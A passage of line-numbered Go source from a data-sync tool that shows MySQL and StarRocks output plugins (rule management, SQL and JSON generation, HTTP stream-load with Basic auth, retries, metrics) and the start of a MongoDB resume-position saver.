151 | } else { 152 | log.Fatalf("not found AfterCommitCallback func") 153 | } 154 | 155 | m.ackTimestamp = m.syncTimestamp 156 | if m.close { 157 | log.Infof("last one flush output data done.") 158 | return 159 | } 160 | } 161 | } 162 | 163 | func (m *Mysql) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 164 | return nil 165 | } 166 | 167 | func (m *Mysql) RewriteExecute(event *msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 168 | outPutSQL, args, err := m.generateSQL(event, table) 169 | log.Debugf("mysql custom row data: %v; args: %v", outPutSQL, args) 170 | if err != nil { 171 | return err 172 | } 173 | _, err = m.ExecuteSQL(outPutSQL, args...) 174 | if err != nil { 175 | return err 176 | } 177 | return nil 178 | } 179 | 180 | func (m *Mysql) Close() { 181 | m.cancel() 182 | m.connLock.Lock() 183 | err := m.conn.Close() 184 | if err != nil { 185 | log.Fatalf("close mysql output err: %v", err.Error()) 186 | } 187 | m.conn = nil 188 | m.connLock.Unlock() 189 | m.wg.Wait() 190 | log.Infof("close mysql output goroutine.") 191 | log.Infof("close mysql output metrics goroutine.") 192 | } 193 | 194 | func (m *Mysql) AddRule(config map[string]interface{}) error { 195 | m.ruleLock.Lock() 196 | defer m.ruleLock.Unlock() 197 | mr := &rule.MysqlRule{Deleted: false} 198 | if err := mapstructure.Decode(config, mr); err != nil { 199 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 200 | } 201 | // if exists, return 202 | ruleKey := rule.RuleKeyFormat(mr.SourceSchema, mr.SourceTable) 203 | for _, ruleObj := range m.rulesMap { 204 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 205 | if ruleKey == tmpRuleKey { 206 | if ruleObj.Deleted { 207 | // if deleted is true, break, waiting to cover. 208 | break 209 | } 210 | return errors.New("output table rule already exists.") 211 | } 212 | } 213 | m.rulesMap[rule.RuleKeyFormat(mr.SourceSchema, mr.SourceTable)] = mr 214 | return nil 215 | } 216 | 217 | func (m *Mysql) DeleteRule(config map[string]interface{}) error { 218 | m.ruleLock.Lock() 219 | defer m.ruleLock.Unlock() 220 | dsr := &rule.DorisRule{} 221 | if err := mapstructure.Decode(config, dsr); err != nil { 222 | return errors.Trace(errors.New(fmt.Sprintf("delete rule config parsing failed. err: %v", err.Error()))) 223 | } 224 | // if exists delete 225 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 226 | for _, ruleObj := range m.rulesMap { 227 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 228 | if ruleKey == tmpRuleKey { 229 | // delete(m.rulesMap, ruleKey) 230 | // only mark deleted 231 | m.rulesMap[ruleKey].Deleted = true 232 | return nil 233 | } 234 | } 235 | return errors.New("output table rule not exists.") 236 | } 237 | 238 | func (m *Mysql) GetRules() interface{} { 239 | return m.rulesMap 240 | } 241 | 242 | func (m *Mysql) GetTable(db string, table string) (*schema.Table, error) { 243 | key := fmt.Sprintf("%s.%s", db, table) 244 | m.tableLock.RLock() 245 | t, ok := m.tables[key] 246 | m.tableLock.RUnlock() 247 | if ok { 248 | return t, nil 249 | } 250 | 251 | r, err := m.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 252 | if err != nil { 253 | return nil, err 254 | } 255 | ta := &schema.Table{ 256 | Schema: db, 257 | Name: table, 258 | Columns: make([]schema.TableColumn, 0, 16), 259 | } 260 | for i := 0; i < r.RowNumber(); i++ { 261 | name, _ := r.GetString(i, 0) 262 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 263 | } 264 | m.tableLock.Lock() 265 | m.tables[key] = ta 266 | m.tableLock.Unlock() 267 | return ta, nil 268 | } 269 | 270 | func (m *Mysql) generateSQL(event *msg.Msg, table *schema.Table) (string, []interface{}, error) { 271 | // datetime 0000-00-00 00:00:00 write err handle 272 | err := m.datetimeHandle(event, table) 273 | if err != nil { 274 | log.Fatalf("datetime type handle failed: %v", err.Error()) 275 | } 276 | schemaTable := rule.RuleKeyFormat(event.Database, event.Table) 277 | ruleMap, _ := m.rulesMap[schemaTable] 278 | 279 | if len(ruleMap.PrimaryKeys) <= 0 { 280 | return "", nil, errors.Errorf("only support data has primary key") 281 | } 282 | pks := make(map[string]interface{}, len(ruleMap.PrimaryKeys)) 283 | for _, pk := range ruleMap.PrimaryKeys { 284 | pks[pk] = event.DmlMsg.Data[pk] 285 | } 286 | 287 | switch event.DmlMsg.Action { 288 | case msg.InsertAction, msg.UpdateAction: 289 | // TODO insert on duplicate key 290 | updateColumnsIdx := 0 291 | columnNamesAssignWithoutPks := make([]string, len(ruleMap.TargetColumns)-len(ruleMap.PrimaryKeys)) 292 | argsWithoutPks := make([]interface{}, len(ruleMap.TargetColumns)-len(ruleMap.PrimaryKeys)) 293 | allColumnNamesInSQL := make([]string, 0, len(ruleMap.TargetColumns)) 294 | allColumnPlaceHolder := make([]string, len(ruleMap.TargetColumns)) 295 | args := make([]interface{}, 0, len(ruleMap.TargetColumns)) 296 | for i, column := range ruleMap.TargetColumns { 297 | columnNameInSQL := fmt.Sprintf("`%s`", column) 298 | allColumnNamesInSQL = append(allColumnNamesInSQL, columnNameInSQL) 299 | allColumnPlaceHolder[i] = "?" 300 | columnData := event.DmlMsg.Data[ruleMap.SourceColumns[i]] 301 | args = append(args, columnData) 302 | _, ok := pks[ruleMap.SourceColumns[i]] 303 | if !ok { 304 | columnNamesAssignWithoutPks[updateColumnsIdx] = fmt.Sprintf("%s = ?", columnNameInSQL) 305 | // columnData := event.DmlMsg.Data[ruleMap.SourceColumns[i]] 306 | argsWithoutPks[updateColumnsIdx] = columnData 307 | updateColumnsIdx++ 308 | } 309 | } 310 | sqlInsert := fmt.Sprintf("INSERT INTO `%s`.`%s` (%s) VALUES (%s)", 311 | ruleMap.TargetSchema, 312 | ruleMap.TargetTable, 313 | strings.Join(allColumnNamesInSQL, ","), 314 | strings.Join(allColumnPlaceHolder, ",")) 315 | sqlUpdate := fmt.Sprintf("ON DUPLICATE KEY UPDATE %s", strings.Join(columnNamesAssignWithoutPks, ",")) 316 | return fmt.Sprintf("%s %s", sqlInsert, sqlUpdate), append(args, argsWithoutPks...), nil 317 | case msg.DeleteAction: 318 | // TODO delete 319 | var whereSql []string 320 | var args []interface{} 321 | for i, column := range ruleMap.TargetColumns { 322 | pkData, ok := pks[ruleMap.SourceColumns[i]] 323 | if !ok { 324 | continue 325 | } 326 | whereSql = append(whereSql, fmt.Sprintf("`%s` = ?", column)) 327 | args = append(args, pkData) 328 | } 329 | if len(whereSql) == 0 { 330 | return "", nil, errors.Errorf("where sql is empty, probably missing pk") 331 | } 332 | 333 | stmt := fmt.Sprintf("DELETE FROM `%s`.`%s` WHERE %s", ruleMap.TargetSchema, ruleMap.TargetTable, strings.Join(whereSql, " AND ")) 334 | return stmt, args, nil 335 | default: 336 | log.Fatalf("unhandled message type: %v", event) 337 | } 338 | return "", nil, errors.Errorf("err handle data: %v", event) 339 | } 340 | 341 | func (m *Mysql) StartMetrics() { 342 | m.promTimingMetrics() 343 | } 344 | 345 | func (m *Mysql) promTimingMetrics() { 346 | m.wg.Add(1) 347 | go func() { 348 | defer m.wg.Done() 349 | ticker := time.NewTicker(time.Second * 3) 350 | defer ticker.Stop() 351 | var newDelaySeconds uint32 352 | for { 353 | select { 354 | case <-ticker.C: 355 | // prom write delay set 356 | now := time.Now() 357 | if m.syncTimestamp.IsZero() || m.ackTimestamp.IsZero() || m.syncTimestamp == m.ackTimestamp { 358 | newDelaySeconds = 0 359 | } else { 360 | newDelaySeconds = uint32(now.Sub(m.ackTimestamp).Seconds()) 361 | } 362 | // log.Debugf("write delay %vs", newDelay) 363 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 364 | case <-m.ctx.Done(): 365 | return 366 | } 367 | } 368 | }() 369 | } 370 | 371 | func (m *Mysql) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 372 | m.connLock.Lock() 373 | defer m.connLock.Unlock() 374 | argF := make([]func(*client.Conn), 0) 375 | retryNum := 3 376 | for i := 0; i < retryNum; i++ { 377 | if m.conn == nil { 378 | m.conn, err = client.Connect(fmt.Sprintf("%s:%d", m.Host, m.Port), m.UserName, m.Password, "", argF...) 379 | if err != nil { 380 | return nil, errors.Trace(err) 381 | } 382 | } 383 | 384 | rr, err = m.conn.Execute(cmd, args...) 385 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 386 | return 387 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 388 | err := m.conn.Close() 389 | if err != nil { 390 | return nil, err 391 | } 392 | m.conn = nil 393 | continue 394 | } else { 395 | return 396 | } 397 | } 398 | return 399 | } 400 | 401 | func (m *Mysql) datetimeHandle(ev *msg.Msg, table *schema.Table) error { 402 | for _, column := range table.Columns { 403 | if column.Type == schema.TypeDatetime { 404 | if ev.DmlMsg.Data[column.Name] == "0000-00-00 00:00:00" { 405 | ev.DmlMsg.Data[column.Name] = "0000-01-01 00:00:00" 406 | } 407 | } 408 | } 409 | return nil 410 | } 411 | 412 | func (m *Mysql) Pause() error { 413 | m.pauseC <- true 414 | return nil 415 | } 416 | 417 | func (m *Mysql) Resume() error { 418 | m.resumeC <- true 419 | return nil 420 | } 421 | 422 | func (m *Mysql) IsPaused() bool { 423 | return m.paused 424 | } 425 | -------------------------------------------------------------------------------- /pkg/output/op_starrocks.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import ( 4 | "context" 5 | "encoding/base64" 6 | "encoding/json" 7 | "fmt" 8 | "github.com/go-mysql-org/go-mysql/client" 9 | "github.com/go-mysql-org/go-mysql/mysql" 10 | "github.com/juju/errors" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 17 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 18 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 19 | "github.com/mitchellh/mapstructure" 20 | "github.com/siddontang/go-log/log" 21 | "io" 22 | "net/http" 23 | "strings" 24 | "sync" 25 | "time" 26 | ) 27 | 28 | type Starrocks struct { 29 | *config.StarrocksConfig 30 | tableLock sync.RWMutex 31 | tables map[string]*schema.Table 32 | ruleLock sync.RWMutex 33 | rulesMap map[string]*rule.StarrocksRule 34 | lastCtlMsg *msg.Msg 35 | syncTimestamp time.Time // sync chan中last event timestamp 36 | ackTimestamp time.Time // sync data ack的 event timestamp 37 | close bool 38 | connLock sync.Mutex 39 | conn *client.Conn 40 | inSchema core.Schema 41 | wg sync.WaitGroup 42 | ctx context.Context 43 | cancel context.CancelFunc 44 | pauseC chan bool 45 | resumeC chan bool 46 | paused bool 47 | tr *http.Transport 48 | cli *http.Client 49 | } 50 | 51 | const StarrocksName = "starrocks" 52 | 53 | func init() { 54 | registry.RegisterPlugin(registry.OutputPlugin, StarrocksName, &Starrocks{}) 55 | } 56 | 57 | func (sr *Starrocks) Configure(pipelineName string, configOutput map[string]interface{}) error { 58 | sr.StarrocksConfig = &config.StarrocksConfig{} 59 | var target = configOutput["target"] 60 | err := mapstructure.Decode(target, sr.StarrocksConfig) 61 | if err != nil { 62 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 63 | } 64 | return nil 65 | } 66 | 67 | func (sr *Starrocks) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 68 | // init map obj 69 | sr.tables = make(map[string]*schema.Table) 70 | sr.rulesMap = make(map[string]*rule.StarrocksRule) 71 | 72 | sr.ctx, sr.cancel = context.WithCancel(context.Background()) 73 | 74 | sr.close = false 75 | sr.StartMetrics() 76 | var err error 77 | // init conn 78 | sr.conn, err = client.Connect(fmt.Sprintf("%s:%d", sr.Host, sr.Port), sr.UserName, sr.Password, "") 79 | if err != nil { 80 | log.Fatal("output config conn failed. err: ", err.Error()) 81 | } 82 | // init rulesMap 83 | if err = mapstructure.Decode(rulesMap, &sr.rulesMap); err != nil { 84 | log.Fatal(err) 85 | } 86 | sr.inSchema = inSchema 87 | sr.pauseC = make(chan bool, 1) 88 | sr.resumeC = make(chan bool, 1) 89 | sr.paused = false 90 | sr.tr = &http.Transport{} 91 | sr.cli = &http.Client{ 92 | Transport: sr.tr, 93 | CheckRedirect: func(req *http.Request, via []*http.Request) error { 94 | req.Header.Add("Authorization", "Basic "+sr.auth()) 95 | // log.Debugf("重定向请求到be: %v", req.URL) 96 | return nil // return nil nil回重定向。 97 | }, 98 | } 99 | } 100 | 101 | func (sr *Starrocks) StartOutput(outputChan *channel.OutputChannel) { 102 | sr.wg.Add(1) 103 | 104 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 105 | defer ticker.Stop() 106 | defer sr.wg.Done() 107 | 108 | eventsLen := 0 109 | schemaTableEvents := make(map[string][]*msg.Msg) 110 | for { 111 | needFlush := false 112 | select { 113 | case v := <-outputChan.SyncChan: 114 | switch data := v.(type) { 115 | case *msg.Msg: 116 | if data.Type == msg.MsgCtl { 117 | sr.lastCtlMsg = data 118 | continue 119 | } 120 | 121 | sr.syncTimestamp = data.Timestamp 122 | 123 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 124 | rowsData, ok := schemaTableEvents[schemaTable] 125 | if !ok { 126 | schemaTableEvents[schemaTable] = make([]*msg.Msg, 0, outputChan.ChannelSize) 127 | } 128 | schemaTableEvents[schemaTable] = append(rowsData, data) 129 | eventsLen += 1 130 | 131 | if eventsLen >= outputChan.ChannelSize { 132 | needFlush = true 133 | } 134 | } 135 | case <-sr.ctx.Done(): 136 | needFlush = true 137 | log.Infof("wait last one flush output data...") 138 | sr.close = true 139 | case <-ticker.C: 140 | needFlush = true 141 | case <-sr.pauseC: 142 | sr.paused = true 143 | <-sr.resumeC 144 | select { 145 | default: 146 | sr.paused = false 147 | continue 148 | } 149 | } 150 | 151 | if needFlush { 152 | for schemaTable := range schemaTableEvents { 153 | ruleMap, ok := sr.rulesMap[schemaTable] 154 | if !ok { 155 | log.Fatalf("get ruleMap failed: %v", schemaTable) 156 | } 157 | tableObj, err := sr.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 158 | // tableObj, err := sr.GetTable(ruleMap.TargetSchema, ruleMap.TargetTable) 159 | if err != nil { 160 | // get rule Deleted, if true continue (api delete sync table) bug fix #21 161 | if ruleMap.Deleted { 162 | delete(schemaTableEvents, schemaTable) 163 | continue 164 | } 165 | log.Fatal(err) 166 | } 167 | 168 | err = sr.Execute(schemaTableEvents[schemaTable], tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 169 | if err != nil { 170 | log.Fatalf("do starrocks bulk err %v, close sync", err) 171 | sr.cancel() 172 | return 173 | } 174 | delete(schemaTableEvents, schemaTable) 175 | } 176 | 177 | if sr.lastCtlMsg.AfterCommitCallback != nil { 178 | err := sr.lastCtlMsg.AfterCommitCallback(sr.lastCtlMsg) 179 | if err != nil { 180 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 181 | } 182 | // log.Debugf("after commit callback lastCtl: %v", sr.lastCtlMsg.InputContext) 183 | } else { 184 | log.Fatalf("not found AfterCommitCallback func") 185 | } 186 | 187 | sr.ackTimestamp = sr.syncTimestamp 188 | eventsLen = 0 189 | // ticker.Reset(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 190 | if sr.close { 191 | log.Infof("last one flush output data done.") 192 | return 193 | } 194 | } 195 | } 196 | } 197 | 198 | func (sr *Starrocks) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 199 | if len(msgs) == 0 { 200 | return nil 201 | } 202 | var jsonList []string 203 | 204 | jsonList = sr.generateJSON(msgs) 205 | log.Debugf("starrocks bulk custom %s.%s row data num: %d", targetSchema, targetTable, len(jsonList)) 206 | for _, s := range jsonList { 207 | log.Debugf("starrocks custom %s.%s row data: %v", targetSchema, targetTable, s) 208 | } 209 | var err error 210 | for i := 0; i < RetryCount; i++ { 211 | err = sr.SendData(jsonList, table, targetSchema, targetTable, nil) 212 | if err != nil { 213 | log.Warnf("send data failed, err: %v, execute retry...", err.Error()) 214 | if i+1 == RetryCount { 215 | break 216 | } 217 | time.Sleep(time.Duration(RetryInterval*(i+1)) * time.Second) 218 | continue 219 | } 220 | break 221 | } 222 | return err 223 | } 224 | 225 | func (sr *Starrocks) Close() { 226 | sr.cancel() 227 | sr.connLock.Lock() 228 | err := sr.conn.Close() 229 | if err != nil { 230 | log.Fatalf("close starrocks output err: %v", err.Error()) 231 | } 232 | sr.conn = nil 233 | sr.connLock.Unlock() 234 | sr.wg.Wait() 235 | log.Infof("close starrocks output goroutine.") 236 | log.Infof("close starrocks output metrics goroutine.") 237 | } 238 | 239 | func (sr *Starrocks) AddRule(config map[string]interface{}) error { 240 | sr.ruleLock.Lock() 241 | defer sr.ruleLock.Unlock() 242 | srr := &rule.StarrocksRule{Deleted: false} 243 | if err := mapstructure.Decode(config, srr); err != nil { 244 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 245 | } 246 | // if exists, return 247 | ruleKey := rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable) 248 | for _, ruleObj := range sr.rulesMap { 249 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 250 | if ruleKey == tmpRuleKey { 251 | if ruleObj.Deleted { 252 | // if deleted is true, break, waiting to cover. 253 | break 254 | } 255 | return errors.New("output table rule already exists.") 256 | } 257 | } 258 | sr.rulesMap[rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable)] = srr 259 | return nil 260 | } 261 | 262 | func (sr *Starrocks) DeleteRule(config map[string]interface{}) error { 263 | sr.ruleLock.Lock() 264 | defer sr.ruleLock.Unlock() 265 | srr := &rule.StarrocksRule{} 266 | if err := mapstructure.Decode(config, srr); err != nil { 267 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 268 | } 269 | // if exists, return 270 | ruleKey := rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable) 271 | for _, ruleObj := range sr.rulesMap { 272 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 273 | if ruleKey == tmpRuleKey { 274 | // delete(sr.rulesMap, ruleKey) 275 | // only mark deleted 276 | sr.rulesMap[ruleKey].Deleted = true 277 | return nil 278 | } 279 | } 280 | return errors.New("output table rule not exists.") 281 | } 282 | 283 | func (sr *Starrocks) GetRules() interface{} { 284 | return sr.rulesMap 285 | } 286 | 287 | func (sr *Starrocks) GetTable(db string, table string) (*schema.Table, error) { 288 | key := fmt.Sprintf("%s.%s", db, table) 289 | sr.tableLock.RLock() 290 | t, ok := sr.tables[key] 291 | sr.tableLock.RUnlock() 292 | if ok { 293 | return t, nil 294 | } 295 | r, err := sr.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 296 | if err != nil { 297 | return nil, err 298 | } 299 | ta := &schema.Table{ 300 | Schema: db, 301 | Name: table, 302 | Columns: make([]schema.TableColumn, 0, 16), 303 | } 304 | for i := 0; i < r.RowNumber(); i++ { 305 | name, _ := r.GetString(i, 0) 306 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 307 | } 308 | sr.tableLock.Lock() 309 | sr.tables[key] = ta 310 | sr.tableLock.Unlock() 311 | return ta, nil 312 | } 313 | 314 | func (sr *Starrocks) generateJSON(msgs []*msg.Msg) []string { 315 | var jsonList []string 316 | 317 | for _, event := range msgs { 318 | switch event.DmlMsg.Action { 319 | case msg.InsertAction: 320 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 321 | event.DmlMsg.Data[DeleteColumn] = 0 322 | b, _ := json.Marshal(event.DmlMsg.Data) 323 | jsonList = append(jsonList, string(b)) 324 | case msg.UpdateAction: 325 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 326 | event.DmlMsg.Data[DeleteColumn] = 0 327 | b, _ := json.Marshal(event.DmlMsg.Data) 328 | jsonList = append(jsonList, string(b)) 329 | case msg.DeleteAction: // starrocks2.4版本只支持primary key模型load delete 330 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 331 | event.DmlMsg.Data[DeleteColumn] = 1 332 | b, _ := json.Marshal(event.DmlMsg.Data) 333 | jsonList = append(jsonList, string(b)) 334 | case msg.ReplaceAction: // for mongo 335 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 336 | event.DmlMsg.Data[DeleteColumn] = 0 337 | b, _ := json.Marshal(event.DmlMsg.Data) 338 | jsonList = append(jsonList, string(b)) 339 | default: 340 | log.Fatalf("unhandled message type: %v", event) 341 | } 342 | } 343 | return jsonList 344 | } 345 | 346 | func (sr *Starrocks) SendData(content []string, table *schema.Table, targetSchema string, targetTable string, ignoreColumns []string) error { 347 | /**cli := &http.Client{ 348 | Timeout: 10 * time.Second, 349 | CheckRedirect: func(req *http.Request, via []*http.Request) error { 350 | req.Header.Add("Authorization", "Basic "+sr.auth()) 351 | req.URL.Host = "127.0.0.1:8040" 352 | log.Infof("重定向请求到be: %v", req.URL) 353 | return nil // return nil nil回重定向。 354 | }, 355 | }*/ 356 | loadUrl := fmt.Sprintf("http://%s:%d/api/%s/%s/_stream_load", 357 | sr.Host, sr.LoadPort, targetSchema, targetTable) 358 | newContent := `[` + strings.Join(content, ",") + `]` 359 | req, _ := http.NewRequest("PUT", loadUrl, strings.NewReader(newContent)) 360 | 361 | // req.Header.Add 362 | req.Header.Add("Authorization", "Basic "+sr.auth()) 363 | req.Header.Add("Expect", "100-continue") 364 | req.Header.Add("strict_mode", "true") 365 | // req.Header.Add("label", "39c25a5c-7000-496e-a98e-348a264c81de") 366 | req.Header.Add("format", "json") 367 | req.Header.Add("strip_outer_array", "true") 368 | 369 | var columnArray []string 370 | for _, column := range table.Columns { 371 | if sr.isContain(ignoreColumns, column.Name) { 372 | continue 373 | } 374 | columnArray = append(columnArray, "`"+column.Name+"`") 375 | } 376 | columnArray = append(columnArray, DeleteColumn) 377 | columns := fmt.Sprintf("%s, __op = %s", strings.Join(columnArray, ","), DeleteColumn) 378 | req.Header.Add("columns", columns) 379 | 380 | response, err := sr.cli.Do(req) 381 | if err != nil { 382 | return errors.Trace(err) 383 | } 384 | defer func(Body io.ReadCloser) { 385 | _ = Body.Close() 386 | }(response.Body) 387 | returnMap, err := sr.parseResponse(response) 388 | if err != nil { 389 | return errors.Trace(err) 390 | } 391 | if returnMap["Status"] != "Success" { 392 | message := returnMap["Message"] 393 | errorUrl := returnMap["ErrorURL"] 394 | errorMsg := message.(string) + 395 | fmt.Sprintf(", targetTable: %s.%s", targetSchema, targetTable) + 396 | fmt.Sprintf(", visit ErrorURL to view error details, ErrorURL: %s", errorUrl) 397 | return errors.Trace(errors.New(errorMsg)) 398 | } 399 | // prom write event number counter 400 | numberLoadedRows := returnMap["NumberLoadedRows"] 401 | metrics.OpsWriteProcessed.Add(numberLoadedRows.(float64)) 402 | return nil 403 | } 404 | 405 | func (sr *Starrocks) auth() string { 406 | s := sr.UserName + ":" + sr.Password 407 | b := []byte(s) 408 | 409 | sEnc := base64.StdEncoding.EncodeToString(b) 410 | return sEnc 411 | } 412 | 413 | func (sr *Starrocks) isContain(items []string, item string) bool { 414 | if len(items) == 0 { 415 | return false 416 | } 417 | for _, eachItem := range items { 418 | if eachItem == item { 419 | return true 420 | } 421 | } 422 | return false 423 | } 424 | 425 | func (sr *Starrocks) parseResponse(response *http.Response) (map[string]interface{}, error) { 426 | var result map[string]interface{} 427 | body, err := io.ReadAll(response.Body) 428 | if err == nil { 429 | err = json.Unmarshal(body, &result) 430 | } 431 | 432 | return result, err 433 | } 434 | 435 | func (sr *Starrocks) StartMetrics() { 436 | sr.promTimingMetrics() 437 | } 438 | 439 | func (sr *Starrocks) promTimingMetrics() { 440 | sr.wg.Add(1) 441 | go func() { 442 | defer sr.wg.Done() 443 | ticker := time.NewTicker(time.Second * 3) 444 | defer ticker.Stop() 445 | var newDelaySeconds uint32 446 | for { 447 | select { 448 | case <-ticker.C: 449 | // prom write delay set 450 | now := time.Now() 451 | if sr.syncTimestamp.IsZero() || sr.ackTimestamp.IsZero() || sr.syncTimestamp == sr.ackTimestamp { 452 | newDelaySeconds = 0 453 | } else { 454 | newDelaySeconds = uint32(now.Sub(sr.ackTimestamp).Seconds()) 455 | } 456 | // log.Debugf("write delay %vs", newDelay) 457 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 458 | case <-sr.ctx.Done(): 459 | return 460 | } 461 | } 462 | }() 463 | } 464 | 465 | func (sr *Starrocks) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 466 | sr.connLock.Lock() 467 | defer sr.connLock.Unlock() 468 | argF := make([]func(*client.Conn), 0) 469 | retryNum := 3 470 | for i := 0; i < retryNum; i++ { 471 | if sr.conn == nil { 472 | sr.conn, err = client.Connect(fmt.Sprintf("%s:%d", sr.Host, sr.Port), sr.UserName, sr.Password, "", argF...) 473 | if err != nil { 474 | return nil, errors.Trace(err) 475 | } 476 | } 477 | 478 | rr, err = sr.conn.Execute(cmd, args...) 479 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 480 | return 481 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 482 | err := sr.conn.Close() 483 | if err != nil { 484 | return nil, err 485 | } 486 | sr.conn = nil 487 | continue 488 | } else { 489 | return 490 | } 491 | } 492 | return 493 | } 494 | 495 | func (sr *Starrocks) Pause() error { 496 | sr.pauseC <- true 497 | return nil 498 | } 499 | 500 | func (sr *Starrocks) Resume() error { 501 | sr.resumeC <- true 502 | return nil 503 | } 504 | 505 | func (sr *Starrocks) IsPaused() bool { 506 | return sr.paused 507 | } 508 | -------------------------------------------------------------------------------- /pkg/output/utils.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import "fmt" 4 | 5 | var DeleteColumn = "_delete_sign_" 6 | var DeleteCondition = fmt.Sprintf("%s=1", DeleteColumn) 7 | var RetryCount = 3 8 | var RetryInterval = 5 9 | -------------------------------------------------------------------------------- /pkg/position/pos_mongo.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "github.com/BurntSushi/toml" 7 | "github.com/juju/errors" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 11 | "github.com/siddontang/go-log/log" 12 | "github.com/siddontang/go/ioutil2" 13 | "strconv" 14 | "sync" 15 | "time" 16 | ) 17 | 18 | type mongoBasePosition struct { 19 | ResumeTokens *msg.WatchId `bson:"_id"` 20 | } 21 | type MongoPosition struct { 22 | sync.RWMutex 23 | *mongoBasePosition 24 | FilePath string 25 | lastSaveTime time.Time 26 | InitStartPosition time.Time 27 | wg sync.WaitGroup 28 | ctx context.Context 29 | cancel context.CancelFunc 30 | } 31 | 32 | const MongoPosName = "mongo" 33 | 34 | func init() { 35 | registry.RegisterPlugin(registry.InputPositionPlugin, MongoPosName, &MongoPosition{}) 36 | } 37 | 38 | func (pos *MongoPosition) Configure(pipelineName string, configInput map[string]interface{}) error { 39 | return nil 40 | } 41 | 42 | func (pos *MongoPosition) LoadPosition(config *config.BaseConfig) string { 43 | var err error 44 | pos.ctx, pos.cancel = context.WithCancel(context.Background()) 45 | // load pos.info file position 46 | positionFilePath := GetPositionFilePath(config) 47 | initPositionData := "[ResumeTokens]\n Data = \"\"" 48 | FindPositionFileNotCreate(positionFilePath, initPositionData) 49 | basePos := &mongoBasePosition{} 50 | if _, err = toml.DecodeFile(positionFilePath, basePos); err != nil { 51 | log.Fatal(err) 52 | } 53 | pos.mongoBasePosition = basePos 54 | pos.FilePath = positionFilePath 55 | 56 | if pos.ResumeTokens.Data != "" { 57 | tm := time.Unix(int64(pos.resumeTokenTimestamp()), 0) 58 | return tm.Format("2006-01-02 15:04:05") 59 | } 60 | 61 | // if ResumeTokens data is "", load config start-position 62 | if config.InputConfig.StartPosition != "" { 63 | var startPosition time.Time 64 | startPosition, err = time.ParseInLocation("2006-01-02 15:04:05", config.InputConfig.StartPosition, time.Local) 65 | if err != nil { 66 | log.Fatal(err) 67 | } 68 | pos.InitStartPosition = startPosition 69 | } 70 | return pos.InitStartPosition.Format("2006-01-02 15:04:05") 71 | } 72 | 73 | func (pos *MongoPosition) SavePosition() error { 74 | if pos.ResumeTokens == nil { 75 | return nil 76 | } 77 | pos.Lock() 78 | defer pos.Unlock() 79 | 80 | n := time.Now() 81 | if n.Sub(pos.lastSaveTime) < time.Second { 82 | return nil 83 | } 84 | pos.lastSaveTime = n 85 | var buf bytes.Buffer 86 | e := toml.NewEncoder(&buf) 87 | var err error 88 | err = e.Encode(pos.mongoBasePosition) 89 | if err != nil { 90 | log.Errorf("save change stream sync position to file %s err %v", pos.FilePath, err) 91 | } 92 | if err = ioutil2.WriteFileAtomic(pos.FilePath, buf.Bytes(), 0644); err != nil { 93 | log.Errorf("save change stream sync position to file %s err %v", pos.FilePath, err) 94 | } 95 | log.Infof("save change stream sync position resumeToken timestamp: %d", pos.resumeTokenTimestamp()) 96 | return 